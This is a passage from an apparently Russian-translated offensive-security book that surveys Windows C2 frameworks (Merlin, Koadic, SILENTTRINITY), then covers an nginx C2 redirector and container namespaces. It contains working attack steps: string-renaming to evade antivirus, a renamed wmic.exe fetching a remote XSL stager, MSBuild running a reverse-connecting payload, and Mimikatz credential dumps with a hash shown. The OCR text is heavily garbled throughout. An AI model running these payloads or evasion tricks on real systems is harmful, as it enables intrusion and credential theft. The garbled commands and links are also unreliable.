и, по сути, должны - настраивать каждый крошечный бит исполня- 
емого шаблона, используемого для сборки стейджера и эксплойтов. 
Мегазр]ой хуже работает под Міпӣомѕ: в нем отсутствует множество 
модулей постэксплойта, которые легко доступны в других фрейм- 
ворках, а методы, используемые тщегртщег, стоят на первом месте 
в контрольном списке любого антивируса. 

МЛпдом: – это отдельная история, поэтому я долгое время предпочи- 
тал фреймворк Етріге (№1р5;//9йћир.сот/ЕтрігеРгојес/Етріге/), который 
предоставляет исчерпывающий список модулей, эксплойтов и мето- 
дов расширения влияния, специально разработанных для Асііуе Гігес- 
согу. К сожалению, Етріге больше не поддерживается оригинальной 
командой, известной по своим псевдонимам в Твиттере: @Фһагтј0у, 
@ѕіхаиЬ, @етета0х3, @гут$ 51, ФКШѕуіёсћ © и @хогпог. Они поло- 
жили начало настоящей революции в сообществе взломщиков Міпаомѕ 
и заслуживают нашей самой искренней признательности. К нашему 
всеобщему восторгу, Етріге вернули к жизни ребята из ВС Ѕесигіїу, вы- 
пустившие версию 3.0 в декабре 2019 г. Я понимаю причину решения 
прекратить поддержку Етріге: весь фреймворк возник из предполо- 
жения, что РоуегЅће1ї позволяет злоумышленникам беспрепятственно 
перемещаться в среде Міпӣомѕ, не опасаясь препятствий со стороны 
антивирусов и средств мониторинга. Поскольку это предположение по- 
теряло смысл после появления таких функций Міпаомѕ 10, как ведение 
журнала блоков сценариев РоумегЅће!1 и АМ$І, имело смысл прекратить 
проект в пользу атак нового поколения, таких как использование С# 
(например, ЅһагрЅріІой: һ1р5;//9/һир.сот/сорЬг/һагрріоі). 


Интерфейс сканирования на наличие вредоносных 
программ (АМ) – это компонент М/іпй0уѕ 10, который перехваты- 
вает вызовы АРІ к критически важным службам Мїпӣоууѕ – контроль 
учетных записей (ОАС), Ј5сгірі, РомегЅће!! и т. д. – для сканирования на 
наличие известных угроз и, в конечном итоге, их блокировки: һїїрѕ//40с5. 
тісгоѕоЃ.сот/еп-иѕ/міпаоуѕ/муіп3 2/атз/Ипом-атз!-Пе[рз. 


В поисках нового С2 


Поскольку проект Етріге мне не подходил, я начал искать потенци- 
альные замены. Я боялся, что мне придется прибегнуть к Сођа1ї Зе Же, 
как это делают 99 % консалтинговых фирм, маскирующих банальные 
фишинговые кампании под работу красной команды. Я ничего не 
имею против этого инструмента - он потрясающий, обеспечивает 
отличную модульность и достоин своей положительной репутации. 


28 Глава 2 


Просто мне неприятно видеть, как толпы фальшивых компаний на- 
зывают себя красными командами только потому, что они купили ли- 
цензию Сорай ЅїігіКе за 5500 долларов. 

Однако я был приятно удивлен, обнаружив, что в вакууме, остав- 
шемся после Етріге, появилось много С2-фреймворков с открытым 
исходным кодом. Вот краткий обзор некоторых интересных вариан- 
тов, которые привлекли мое внимание. Я бегло пройдусь по многим 
сложным концепциям, которые не имеют отношения к нашему теку- 
щему сценарию, и продемонстрирую выполнение полезной нагрузки 
для каждой из них. Если вы не совсем понимаете, как работают неко- 
торые полезные нагрузки, не волнуйтесь. Позже мы вернемся к тем, 
которые нам нужны. 


Мет 


Мет (№#105;//9#һир.сот/М№е0падд/тегііп/) - это С2-фреймворк, напи- 
санный, как и самые популярные инструменты в наши дни, на Соіапе. 
Он может работать на Шпих, Міпаоуѕ и практически на любой другой 
платформе, поддерживаемой средой выполнения бо. Агент, запуска- 
емый на целевой машине, может быть обычным исполняемым фай- 
лом, например файлом РШ. или даже скриптом ЈауаЅсгірі. 

Чтобы начать работу с Мег, сначала установите среду СоІапе. Это 
позволит вам настроить исполняемый агент и добавить модули пост- 
эксплуатации, что, конечно же, настоятельно рекомендуется. 

Установите СоІапе и Мет при помощи следующих команд: 


гоо{@1аЬ:-/# а49-ар&-геро$\+огу рра:10пдѕ1еер/до1апо-Баскрогіѕ 
гоо@ГаЬ:-/# ар ирдафе && зи4о арі іпѕЁа11 901апд-90 
гоо{@1аЬ:-/# до мегѕіоп 

до мегѕіоп 901.13 1іпих/атіб4 


гооЁ@аБ:~/# 91 с1опе Вр: //9іЕҺОЬ.сот/Медпабо/тег1іп && са мег Ап 


Подлинная новизна Мегііп заключается в том, что он использует 
НТТР/2 для связи со своим удаленным сервером. НТТР/2, в отличие 
от НТТР/1.х, является бинарным протоколом, который поддержива- 
ет множество функций повышения производительности, таких как 
мультиплексирование потоков, отправка на сервер и т. д. (отличный 
бесплатный ресурс, в котором подробно рассказано про НТТР/2, 
можно найти по адресу ћі1р5;//апіе/.ћахх.ѕе/һр2/һїр2-ү1.12рар!. Даже 
если система безопасности перехватит и расшифрует трафик С2, она 
может не проанализировать сжатый трафик НТТР/2 и будет вынужде- 
на переслать его без изменений. 

Если мы скомпилируем стандартный агент «из коробки», он будет 
немедленно заблокирован любым обычным антивирусным аген- 


' Вы можете приобрести книгу на русском языке: Поллард Б. НТТР/2 в дей- 
ствии (ћіірѕ:;//ӣткргеѕѕ.сот/саѓаіод/сотриѓег/међ/978-5-97060-925-5/). – Прим. 
перев. 
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том, выполняющим простой поиск строк, содержащих общеизвест- 
ные подозрительные слова, поэтому нам нужно внести некоторые 
коррективы. Мы переименуем подозрительные функции, такие как 
Ехесиїеѕће11, и удалим ссылки на оригинальное имя пакета 91 ВуЬ. 
соп/№0п409 /мег Ап. Воспользуемся классической командой Ғіпа для 
поиска файлов исходного кода, содержащих эти строки, и передачи 
их в хагдз, который, в свою очередь, вызовет ѕей для замены подозри- 
тельных терминов произвольными словами: 


гоо{@аЬ:-/# Ғіпа . -паме '*.90' -Ёуре ЁҒ -рглпе0 \ 
| хагд$ -0 ѕей -1 '5/Ехесиеѕһе11 /МіпіМісе/д' 


гоо{@аЬ:-/# Ғіпа . -паме '*.90' -Ёуре Ғ -рглпе0 \ 
| хаг9ѕ -0 ѕей -1 '5/ехесиёеЅһе11 /тіпіМісе/д' 


гооё@гаБ:~/# Ғіпа . -паме '*.90' -Ёуре ЁҒ -ргіпЕ0 \ 
| хаг9ѕ -0 ѕей -1 '5/\/№0п909\ /мегАп/\ /тіпі\ /һеуһо/9' 


гооЁ@гаБ:~/# ѕед -1 '5/\/Медпабо\ /тег1іп/\ /тіпі\ /Һеуһо/9' 90.тод 


Эта примитивная замена строк позволяет обойти 90 % антивирус- 
ных решений, включая Үіпаомѕ Реѓепӣег. Продолжайте настраивать 
исходный код, а затем тестировать его с помощью такого инструмен- 
та, как УігиѕТоѓа! (ћі05 /Луууу.уігиѕѓоѓа!.сот/диі/), пока не пройдете все 
тесты. 

Теперь скомпилируйте агент в выходной папке, которую мы позже 
внедрим на тестовую машину М/іпаомѕ: 


гоо{@аЬ:-/# таке адеп -міпїомѕ ОТВ=". /оџёриЁ" 
гооє@гаБ:~/# 15 оџёриї/ 
пег1іпАдепё -Аіпӣомѕ - х64.ехе 


После выполнения на машине-жертве мег11пАдеп{-М\пдои$-х64. 
ехе должен снова подключиться к нашему серверу Мет и разрешить 
полный захват цели. 

Мы запускаем сервер Мет С2 с помощью команды до гип и ука- 
зываем ему прослушивать все сетевые интерфейсы с параметром -1 
0.0.0.0: 


гооЁ@аБ:~/# до гип сті/тег1іпѕегуег/таіп.до -1 0.0.0.0 -р 8443 -рѕК\ 
ѕёгопдРаѕѕрһгаѕеАһаёеуегҮоџ/апё 


[-] Ѕёагёіпд №2 115#епег оп 0.0.0.0:8443 


Мег14п>> 


Мы запускаем агента Мет на виртуальной машине Міпӣоугѕ, вы- 
ступающей в качестве цели для запуска полезной нагрузки: 
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РЅ С:\> .\мег\АпАдепе-ИАпдом$-х64.ехе -иг1 Вр: //192.168.1.29:8443 -рѕК\ 
ВашКриптостойкийПароль 

И вот что вы должны увидеть на своем атакующем сервере: 

[+] № аиёһепёісаей адеп бс2Баб-дае{-4а34-аа34-6е94411 


Мег 1. п>> іпёегасё бс2Баб-Чае!-4а34-аа39-Бе944+1 
Мег11п[адеп&] [6с2Баб-Фае{!-...]>> 15 


[+] Вези 5 Рог јоБ зиКЕРмЕРМи аё 2020-09-22718:17:397 


О1гесфогу 115 т9 Рог: С:\ 

-ги-ги-ги- 2020-09-22 19:44:21 16432 Аррѕ 
-Ги-ги-ги- 2020-09-22 19:44:15 986428 ОгАмег$ 
- -сокращено- - 


Агент работает как часы. Теперь мы можем сбрасывать учетные 
данные на целевую машину, искать файлы, перемещаться на другие 
машины, запускать кейлоггер и так далее. 

Мет все еще находится в зачаточном состоянии, поэтому вы бу- 
дете сталкиваться с ошибками и нестыковками, большинство из кото- 
рых связано с нестабильностью библиотеки НТТР/2 в Со]апе. В конце 
концов, это пока еще бета-версия, но усилия, приложенные к этому 
проекту, потрясают воображение. Если вы когда-нибудь хотели ос- 
воить Соіапе, это идеальный шанс. Фреймворк имеет чуть меньше 
50 модулей постэксплуатации, от сборщиков учетных данных до мо- 
дулей для компиляции и выполнения С# в памяти. 


Коааїс 


Фреймворк Коайіс от 7егозит 0х0 (ћрѕ;//9/ћир.сот/гегоѕитОхО/Коаа!с/) 
приобрел популярность с момента его представления на ОЕЕ СОМ 25. 
Коа с ориентирован исключительно на машины М/іпӣомѕ, но его 
главное преимущество заключается в том, что он реализует всевоз- 
можные модные и изящные приемы выполнения полезной нагрузки: 
гед5%г32 (утилита М!сгозой для регистрации библиотек РИ. в реест- 
ре Міпаоуѕ, чтобы они могли вызываться другими программами; ее 
можно использовать для обмана библиотек ОЛ, таких как $гсоЬ] . 911, 
с целью выполнения команд), тѕћёа (утилита М!сгозой, выполняющая 
НТМГ-приложения или НТА), таблицы стилей Х$1. итак далее. Устано- 
вите Коааіс при помощи следующих команд: 


гооЁ@гаБ:~/# 91 с1опе Вр: //9іҺиЬ. сот/ 2егоѕитдх0 /Коайіс. ді 
гооЁ@гаБ:~/# рірЗ іпѕёа11 -г гедиігетепіѕ. Ех 

Затем запустите его (я также включил начало вывода справки): 
гооє@гаБ:~/# . /Коадіс 


(Коадіс: ѕЁа/јѕ/тѕһёа)5 һе1р 
СОММАМО РЕЅСАІРТІОМ№ 


стіѕһе11 соттапа ѕһе11 фо іпёегасё мВ а готБіе 
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сгед$ ѕһомѕ со1Лесёеа сгедеп\а1.5 
Яотаіп ѕһомѕ со1Лесёеа домаіп іпЁогтаёіоп 
- - сокращено- - 


Давайте поэкспериментируем со стейджером (Ѕарег) – небольшим 
фрагментом кода, выгружаемым на целевую машину, чтобы иниции- 
ровать обратное соединение с сервером и загрузить дополнительную 
полезную нагрузку (обычно хранящуюся в памяти). Стейджер за- 
нимает мало места, поэтому, если средство защиты от вредоносных 
программ замечает нашего агента, мы можем легко перенастроить 
агента, не переписывая наши полезные нагрузки. Один из стейдже- 
ров КоаЯіс доставляет свою полезную нагрузку через объект АсііуеХ, 
встроенный в таблицу стилей ХМГ, также называемую Х$ГТ (ћ1р5;// 
умууу.иу3.0г0/51у1е/Х51 /). Его особым образом форматированный вредо- 
носный ХЅІТ-лист может быть загружен в родную утилиту Міпӣоугѕ 
мтіс, которая выполнит встроенный Јауа$сгірї во время рендеринга 
вывода команды 0$ де. Выполните в Коайіс следующие команды, 
чтобы запустить триггер стейджера: 


(Коад\с: ѕ#а/јѕ/тѕһёа)5 изе фадег/)$ /ммАс 
(Коадіс: ѕЁа/јѕ /мтіс)5 гип 


[+] браипед а ѕадег а һер: //192.168.1.25:9996/Аг0х0.хѕ1 


[>] мтіс оз де /РОВМАТ: "Һеёр: //192.168.1.25:9996/Аг0х0.хѕ1" 


Однако показанная выше триггерная команда легко перехватыва- 
ется Защитником Міпӣомуѕ, поэтому нам нужно немного изменить ее, 
например переименовав мтіс.ехе во что-то безобидное, допустим 
ро11у.ехе, как показано ниже. В зависимости от версии Міпӣомѕ на 
компьютере-жертве вам также может потребоваться изменить табли- 
цу стилей, созданную Коааіс, чтобы избежать обнаружения. Опять же, 
для этого должно быть достаточно простой замены строки: 


# Выполнение полезной нагрузки на машине -жертве 


С:\Тетр> сору С: \Міпӣомѕ\5уѕёет32\мбет\мтіс.ехе доПу.ехе 
С:\Тетр> до11у.ехе оѕ деф /ҒОАМАТ: һр: //192.168.1.25:9996/Аг0х0.хѕ1 


Коайіс называет целевые машины словом «зомби». Когда мы про- 
веряем наличие подключения к зомби на нашем сервере, мы должны 
увидеть подробности о целевой машине: 


# Наш сервер 
(Коадіс: ѕЁа/јѕ/тѕһёа)5 готБіеѕ 


[+] Хотріе 1: РІАМ№О\мК_адтіп* @ РТАМО -- Міпдомѕ 10 Рго 
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Мы можем обратиться к зомби по его Ір, чтобы получить основную 
системную информацию: 


(Коадіс: ѕЁа/јѕ/тѕһёа)5 готБіеѕ 1 
10: 1 
Зфафи$: А1іме 
ІР: 192.168.1.30 
Џѕег: РІАМ№О\мК_айтіп* 
Но${пате: РТАМО 

- -сокращено- - 


Затем мы можем выбрать любой из доступных имплантатов с по- 
мощью команды изе ітр1апё/ – от сброса паролей с помощью Міті- 
Ках до перехода на другие машины. Если вы знакомы с Етріге, то 
с Коайіс вы будете чувствовать себя как дома. 

Единственное предостережение заключается в том, что, как 
и в большинстве современных сред Міпӣомѕ С2, вы должны тщатель- 
но настроить и очистить все полезные нагрузки перед их разверты- 
ванием в полевых условиях. Фреймворки С2 с открытым исходным 
кодом - это просто фреймворки. Они заботятся о таких скучных ве- 
щах, как взаимодействие с агентами и шифрование, и предоставляют 
расширяемые плагины и шаблоны кода, но каждый поставляемый 
ими исходный эксплойт или техника выполнения, скорее всего, дав- 
но дискредитированы и должны быть хирургически точно изменены, 
чтобы избежать обнаружения и блокирования антивирусами и сред- 
ствами обнаружения и реагирования в конечных точках (епароіпі аеѓес- 
поп апа геѕропѕе, ЕРК). 


Отдельная благодарность Соуепапі С2 (һіїр://ЬЇ1у/ 
2ТОдРСН) за исключительную простоту настройки. Полезную нагрузку 
каждого модуля на С# можно настроить прямо из веб-интерфейса пе- 
ред отправкой на машину-жертву. 


Для этой правки иногда подойдет грубая замена строки; в других 
случаях нам нужно перекомпилировать код или вырезать некоторые 
биты. Не ожидайте, что какая-либо из этих платформ будет безупреч- 
но работать «из коробки» в совершенно новой и защищенной системе 
ҮГіпӣомѕ 10. Потратьте время на изучение техники выполнения при- 
ложений и приведите ее в соответствие с вашим собственным кон- 
текстом. 


УШЕМТТЕМИУ 


Последний фреймворк С2, о котором я хотел бы рассказать, - мой 
личный фаворит: ЅПЕМТТЕІМІТҮ —(Р#р$//АЙРиЬ.сот/БуЕ315343/ 
ЅІГЕМТТАІМІТҮ). Здесь используется настолько оригинальный подход, 
что я думаю, вам следует на какое-то время прервать чтение этой 
книги и посмотреть доклад Марчелло Сальвати «топРушоп ... ОМЕС» 
о среде .МЕТ на УоиТиБе (ћрѕ;//уоиѓи.Бе/у Вруѓ4аѕи?ү). 
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Грубо говоря, РомегЅћеП и код С# создают промежуточный ассемб- 
лерный код, который должен выполняться фреймворком „МЕТ. Тем 
не менее есть много других языков, которые могут выполнять ту же 
работу: Е#, ІгопРуќћоп, ... и Воо-Гапе! Да, серьезно, это настоящий 
язык - можете поискать сами. Это как если бы любителя Руіоп и фа- 
натика М1сгозоЁ заперли в камере и заставили сотрудничать друг 
с другом, чтобы спасти человечество от надвигающейся голливуд- 
ской гибели. 

В то время как каждый поставщик систем безопасности занят по- 
иском сценариев Ромегэре! и странных командных строк, ЭШЕМТ- 
ТКІМІТҮ мирно скользит по облакам, используя Воо-Гапе для взаимо- 
действия с внутренними службами Міпаомѕ и сбрасывая совершенно 
безопасные на вид дьявольские бомбы. 

Для серверной части инструмента требуется Руфоп 3.7, поэтому пе- 
ред его установкой убедитесь, что Руѓћоп работает правильно; затем 
перейдите к загрузке и запуску командного сервера ЗЅПШЕМТТКІМІТҮ: 


# Терминал 1 

гооЁ@аб:~/# 91 с1опе ВЕЁре: //9іҺиЬ. сот/БуЄЗЬ133аЗг/ЅІГЕМТТВІМІТҮ 
гооё@гаБ:~/# са ЅІГЕМТТВІМІТҮ 

гооЁ@габ:5Т/# руһоп3.7 -м рір іпѕёа11 ѕеёирёоо15 

гооЁ@гаБ:5Т/# руЁһоп3.7 -м рір іпѕЁа11 -г гедиігетепіѕ.хЕ 


# Запуск командного сервера 
гооЁ@габ:5Т/# руёћоп3.7 Ёеатѕегуег.ру 0.0.0.0 ѕгопдРаѕѕмогСапСиеѕѕ & 


Вместо того чтобы работать как локальная независимая програм- 
ма, ЗПЕМТТКІМІТҮ запускает сервер, который прослушивает порт 
5000, позволяя нескольким участникам подключаться, определять 
своих слушателей, генерировать полезные нагрузки и т. д., что очень 
полезно в командных операциях. Вам нужно оставить сервер рабо- 
тающим в первом терминале, а затем открыть второй, чтобы под- 
ключиться к командному серверу и настроить прослушиватель на 
порту 443: 


# Терминал 2 

гоо@ГаЬ:-/# руёћоп3.7 5ї.ру м55:// 

изегпапе : ѕЕгопдРаѕѕиогіСапСиеѕ5@192.168.1.29:5000 
[1] 5Т >> 11ѕїепегѕ 

[1] 5Т (И епег$)>> изе һҺё&рѕ 


# Настройка параметров 

[1] 5Т (И %епег$)(ВЕЕр$) >> ѕеі Маме сиѕёотііѕЁепег 
[1] 5Т (И епег$)(ВЕЕр$) >> её Са11Васкуг15 

БЕЕр : / /ммм. сиѕёотротаіп. сот/пемѕ -аг1с1е-Реед 


# Запуск прослушивателя 


[1] 5Т (И епег$)(ВЕЁр$) >> ѕЁагі 
[1] 5Т (И епег$)(НЕЕр$) >> 115% 
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Вупптлд: 
сиѕіотііѕЁепег >> НЕрз://192.168.1.29:443 


После подключения следующим логическим шагом будет создание 
полезной нагрузки для выполнения на машине-жертве. Мы выбира- 
ем задачу .МЕТ, содержащую встроенный код С#, который мы можем 
скомпилировать и запустить на лету с помощью утилиты „МЕТ под 
названием М$ВийЙа: 


[1] 5Т (115#епегѕ) (ћёЕёрѕ) >> ѕЁадегѕ 


[1] $Т (${адег$) >> иѕе тѕБиі1а 
[1] 5Т (${адег$) >> депегаёе сиѕЁотііѕёепег 
[+] Сепегаёеа ѕёадег о . /ѕ&адег. хі. 


Если мы внимательно посмотрим на файл з*адег.хт, то увидим, 
что он содержит закодированную в баѕеб4 версию исполняемого фай- 
ла пада.ехе ($ПЕМТТЕПМТТУ/согееатазегует/Аа{а/паза.ехе), который 
выполняет обратное подключение к указанному нами прослушива- 
телю, а затем загружает 21Р-файл, содержащий библиотеки Ри. Воо- 
Гапе и сценарий для начальной загрузки среды. 

Как только мы скомпилируем и запустим эту полезную нагрузку на 
лету с помощью М$ВиПа, у нас будет полная среда Воо, работающая 
на целевой машине и готовая выполнить любую сомнительную по- 
лезную нагрузку, которую мы отправим: 


# стагЕё адепе 
Р5 С:\> С: \Міпіомѕ \Місгоѕоѓё. Ме\ Егатемногк\у4.0.30319\М5В0114.ехе °{адег. хп. 


[*] [75-угЕ3] Ѕепдіпо ѕ&аде (569057 Буёеѕ) -> 192.168.1.30... 

[*] [75-угЕЄЗ] №м ѕеѕѕіоп Збе7#9е3-13е4-4Ға1-9266-89095612еерс соппесіей! 
(192.168.1.30) 

[1] 5Т (115ёепегѕ) (ҺЕ&рѕ) >> ѕеѕѕіопѕ 

[1] 5Т (ѕеѕѕ1опѕ) >> 15 

Мате >> Узег >> Аййгеѕѕ >> Гаѕї Сһескіп 
Збе7#9е3-13... >> *иК_адт@РТАМО>> 192.168.1.3 >> һ 00 м 00 $ 04 


Обратите внимание, что, в отличие от двух других фреймворков, 
мы не удосужились скорректировать полезную нагрузку для обхода 
Защитника Міпӣом. Это просто работает... на данный момент! 

Мы можем поставить любой из имеющихся сегодня 69 модулей 
постэксплуатации, от загрузки произвольного исполняемого файла 
„МЕТ в память до обычной разведки Асііуе Гігесїогу и сброса учетных 
данных: 


[1] 5Т (ѕеѕ510пѕ) >> тойџ1еѕ 
[1] 5Т (птод\е$) >> изе Боо/тітіКаїх 
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[1] 5Т (под\е$) (Боо/тітіКаё2) >> гип а 


[*] [75-7#һҺрү] 36е7#9ез-13е4-4#а1-9266-89995612ее6с гефигпед јоЬ геѕи1+ 
(19: 2раү2һр11) 
[+] Киппіпд іп Һіһ іпёедгіёу ргосеѕ5 
- - сокращено- - 
ту : 
[90000003] Ргітагу 
* Џѕегпате : мКайтіп 
* "Ротаіп : РТАМО. ОСА 
* МТМ : адеға76971#3745866с36061#30е3с42 
- - сокращено- - 


Проект еще очень молод, но обладает огромным потенциалом. Од- 
нако, если вы новичок, вам может очень недоставать документации 
и обработчика ошибок. Инструмент все еще активно развивается, так 
что это неудивительно. Я бы посоветовал вам сначала изучить бо- 
лее доступные проекты, такие как Етріге, прежде чем использовать 
и вносить свой вклад в ЅЗП.ЕМТТКІМІТҮ. Хотя почему бы и нет? Это 
дьявольски замечательный проект! 

Есть много других фреймворков, появившихся за последние пару 
лет, и все они заслуживают внимания: Соуепапї, ЕасНоп С2 и так да- 
лее. Я настоятельно рекомендую вам развернуть пару виртуальных 
машин, протестировать разные фреймворки и выбрать тот из них, 
который вам наиболее удобен. 


Дополнительные ресурсы 


• Дополнительную информацию об утилите МісгоѕоЁ геэзуг32 мож- 
но найти по адресу ћіір;//і.1у/20РЈ6о9 и ВИр5 ммм. агао6Ь5.сот/ 
5сгірі1еїѕ/199101569. 

• Прочтите публикацию в блоге Эмерика Наси Наскіп= агоипа НТА 
Иез: һр //1од.ѕеуадаѕ.сот/?Наскіпд-агоипа-НТА-ўеѕ. 

• Дополнительную информацию о сборках в среде .МЕТ вы найдете 


в статье Антонио Парата .МЕТ тягитетайоп ма МП, Вуѓесойе т- 
јесіоп: һір//1+.1у/211 2189. 


ДА БУДЕТ 
ИНФРАСТРУКТУРА! 


В этой главе мы построим серверную часть атакующей 

инфраструктуры, а также установим инструменты, необ- 

ходимые для точного воспроизведения и автоматизации 

почти всех утомительных аспектов ручной настройки. Мы 
будем придерживаться двух фреймворков: Меѓаѕріоії для 
Ипих и ЗШЕМТТЕПМИТУ для Міпаом. 


Устаревший метод настройки 


Старый способ построения атакующей инфраструктуры состоял 
в том, чтобы установить каждый из ваших фреймворков на маши- 
ну и использовать в качестве интерфейса веб-сервер для приема 
и маршрутизации трафика в соответствии с простыми правилами со- 
поставления с образцом. Как показано на рис. 3.1, запросы к /зесге*- 
Раде перенаправляются на серверную часть С2, в то время как осталь- 
ные страницы возвращают, казалось бы, безобидное содержимое. 

Веб-сервер М№ешх является популярным инструментом для пере- 
сылки веб-трафика и не требует сложной настройки. Начнем с уста- 
новки веб-сервера с помощью классического менеджера пакетов 
(в данном случае ар®): 
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гоо{@аЬ:-/# арі іпѕёа11 -у пдіпх 
гооё@гаБ:~/# уі /еёс/подіпх/сопЁ./геуегѕе. сопЁ 


/іпаех 
Поддельная страница 


/бесгеРаде 


Рис. 3.1. Иллюстрация серверной части С2 


Затем создадим файл конфигурации, описывающий наши полити- 
ки маршрутизации, как показано в листинге 3.1. 


Листинг 3.1. Стандартный файл конфигурации №іпх 
с перенаправлением НТТР 


#/еёс/подіпх/сопЁ.Я/геуегѕе.сопЁ 


ѕегуег { 
# базовая конфигурация веб-сервера 
115#еп 80; 


# обычные запросы обслуживаются из /маг/имм/һЁт1. 
гооЁ /маг /имм/ҺЕті; 

іпдех 1пдех. Вт; 

ѕегуег_пате имм.мудота\лп. сом; 


# вернуть код 404, если файл или каталог не найден 
Тоса оп / { 

{гу _ЕДез $игі $игі/ =404; 
} 


# Запросы по адресу /м5Р перенаправляются на наш сервер С2 
Тоса оп /тѕ# { 

ргоху_разз НЕЁрз://192.168.1.29:8443; 

ргоху 551 уегіҒу оЁ#; 

ргоху_ѕеё һеайег Ноѕі $һћоѕі; 

ргоху_ѕеё һеайег Х-Рогмагдед-Рог Ѕргоху айй х Ғогмагаеа Ёог; 
} 


# повторите предыдущий блок для остальных серверов С2 


} 


Первые несколько директив определяют корневой каталог, содер- 
жащий веб-страницы, возвращаемые для обычных запросов. Затем 
мы указываем №еіпх перенаправлять запросы по адресу /тѕЁ, прямо 
на наш сервер С2, как это видно из директивы ргоху_раз$. 
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Далее мы можем быстро настроить сертификаты Ѕесиге Зе! ($51) 
с помощью Іеѓѕ Епсгурї через Сег Бо и получить полнофункциональ- 
ный веб-сервер с перенаправлением НТТР: 


гоо{@1аЬ:-/# ада-арё- героѕіёогу рра: сегЕБо* /сегБо{ 
гоо{@1аЬ:-/# аре ирдафе && арі іпѕёа11 руёћоп-сегБоё-пдіпх 
гооё@гаБ:~/# сегЕБо{ --пдАпх -9 туйотаіп.сот - ими.мудотатл. сот 


Сопогаёи1аёіопѕ! Үоиг сег\Ғісаёе апа сһаіп һауе Бееп за\уеЧ а+... 


Этот метод вполне удобен, за исключением того, что настройка сер- 
веров №еіпх или Арасһе быстро надоедает, тем более что эта машина 
вынуждена постоянно поддерживать соединение с целевым компью- 
тером, что резко повысит ее волатильность. Сервер всегда находится 
в одном шаге от перезапуска или даже остановки. 


Некоторые поставщики облачных услуг, такие как 
Атағоп Иер Ѕегуісеѕ (АИ/5), автоматически обновляют общедоступ- 
ный ІР-адрес хоста при перезапуске. Однако другие облачные провай- 
деры, такие как Пепа!Осеап, назначают машине фиксированный ІР- 
адрес. 


Настройка серверов С2 тоже не доставляет удовольствия. Ни один 
хостинг-провайдер не предоставит вам безупречный дистрибутив Кай 
со всеми предустановленными зависимостями. Эта задача возлагает- 
ся на вас, и вам лучше установить версию Меазрой для Киру; в про- 
тивном случае он выдаст ошибки, которые заставят вас усомниться 
в собственном рассудке. То же самое можно сказать почти о любом 
приложении, использующем определенные расширенные функции 
данной среды. 


Контейнеры и виртуализация 


Современное решение состоит в том, чтобы упаковать в контейнер 
все ваши приложения со всеми их зависимостями, правильно уста- 
новленными и настроенными на нужную версию. Когда вы запускае- 
те новую машину, вам не нужно ничего устанавливать. Вы просто за- 
гружаете готовый контейнер и пользуетесь его содержимым. В этом 
и заключается суть контейнерной технологии, которая покорила от- 
расль и изменила подход к установке и выполнению программ. По- 
скольку позже мы будем иметь дело с некоторыми контейнерами, 
давайте потратим немного времени, чтобы изучить их внутренности, 
подготовив нашу собственную маленькую среду. 


ШЗ — Другим решением может быть автоматизация раз- 
вертывания компонентов с помощью таких инструментов, как Апѕіре 
или СПЕ}. 
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В мире контейнерных технологий есть много игроков, каждый из 
которых работает на разных уровнях абстракции или предоставля- 
ет различные функции изоляции, включая сопїѓаіпега, гипс, ХС, гКї, 
ОрепУ7 и Каїѓа Сопќаіпегѕ. Я буду использовать флагманский продукт 
РосКег, потому что мы столкнемся с ним позже в книге. 

Стремясь облегчить понимание идеи контейнеризации, большин- 
ство экспертов сравнивают ее с виртуализацией: «Контейнеры - это 
облегченные виртуальные машины, за исключением того, что они 
совместно используют ядро своего хоста». Это определение обычно 
сопровождает традиционную схему, изображенную на рис. 3.2. 


Прил. 1 


/Біп 


Механизм контейнеризации 
Операционная система 


Инфраструктура 


ар 


Этого определения может быть достаточно для большинства про- 
граммистов, которые просто хотят развернуть приложение как можно 
быстрее, но хакерам нужно больше, им нужны детали. Наш долг – знать 
технологию настолько хорошо, чтобы уметь нарушать ее правила. 
Сравнивать виртуализацию с контейнеризацией - все равно, что срав- 
нивать самолет с автобусом. Конечно, мы все согласны, что цель у них 
одна - перевозить людей, но логистика - это не единственный крите- 
рий. Черт возьми, у них даже физические принципы разные. 

Виртуализация создает полнофункциональную операционную си- 
стему поверх существующей. Она выполняет свою собственную по- 
следовательность загрузки и загружает файловую систему, планиров- 
щик, структуры ядра и все остальное. Гостевая операционная система 
искренне считает, что она работает на реальном оборудовании, но 
тайно, за каждым системным вызовом, служба виртуализации (ска- 
жем, Ушиа!Вох) переводит все низкоуровневые операции, такие как 
чтение файла или запуск прерывания, на собственный язык хоста, 
и наоборот. Благодаря этому вы можете запустить гостевую систему 
рих на машине с М/іпӣомѕ. 


Рис. 5.2. Упрощенное представление принципа контейнеризации 
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Контейнеризация - это другая парадигма, в которой системные ре- 
сурсы разделены и защищены с помощью продуманной комбинации 
трех мощных функций ядра Шпих: пространств имен, объединенной 
файловой системы и контрольных групп. 


Пространства имен 


Пространства имен - это теги, которые можно назначать ресурсам 
Ппих, таким как процессы, сети, пользователи, смонтированные фай- 
ловые системы и т. д. По умолчанию все ресурсы в данной системе ис- 
пользуют одно и то же пространство имен, поэтому любой обычный 
пользователь Ипих может запросить перечень всех процессов, просмот- 
реть всю файловую систему, получить список пользователей ит. д. 

Но когда мы запускаем контейнер, всем этим новым ресурсам, 
созданным средой контейнера, – процессам, сетевым интерфейсам, 
файловой системе и т. д. - назначается другой тег. Они помещаются 
в свое собственное пространство имен и игнорируют существование 
ресурсов вне этого пространства. 

Прекрасной иллюстрацией данной концепции является организа- 
ция процессов Шпих. При загрузке Шпих запускает процесс зуз{емд, 
которому назначается идентификатор процесса (РТО) номер 1. Затем 
этот процесс запускает последующие службы и демоны, такие как 
МемогКМападег, сгопд и $$Н4, которым назначаются увеличивающиеся 
номера РТО, как показано ниже: 


гоо{@1аЬ:-/# рѕёгее -р 
зуз{ет4(1)-—г-ассоип{$-Чаетоп(777)——{9496и5} (841) 
1 {отаіп} (826) 
[-асрій(800) 
-адеїёу(1121) 


Все процессы связаны с одной и той же древовидной структурой, 
возглавляемой ѕуѕёеті, и все они принадлежат к одному и тому же 
пространству имен. Поэтому они могут видеть друг друга и взаимо- 
действовать между собой - при условии, конечно, что у них есть на 
это разрешение. 

Когда РоскКег (или, точнее, гипС, низкоуровневый компонент, отве- 
чающий за запуск контейнеров) порождает новый контейнер, он сна- 
чала выполняет себя в пространстве имен по умолчанию (с РІ” 5 на 
рис. 5.3), а затем запускает дочерние процессы в новом пространстве 
имен. Первый дочерний процесс получает локальный РПО 1 в этом но- 
вом пространстве имен вместе с другим РТ в пространстве имен по 
умолчанию (скажем, 6, как на рис. 3.3). 

Процессы в новом пространстве имен не осведомлены о том, что про- 
исходит за пределами их среды, однако более старые процессы в про- 
странстве имен по умолчанию сохраняют полную видимость всего дере- 
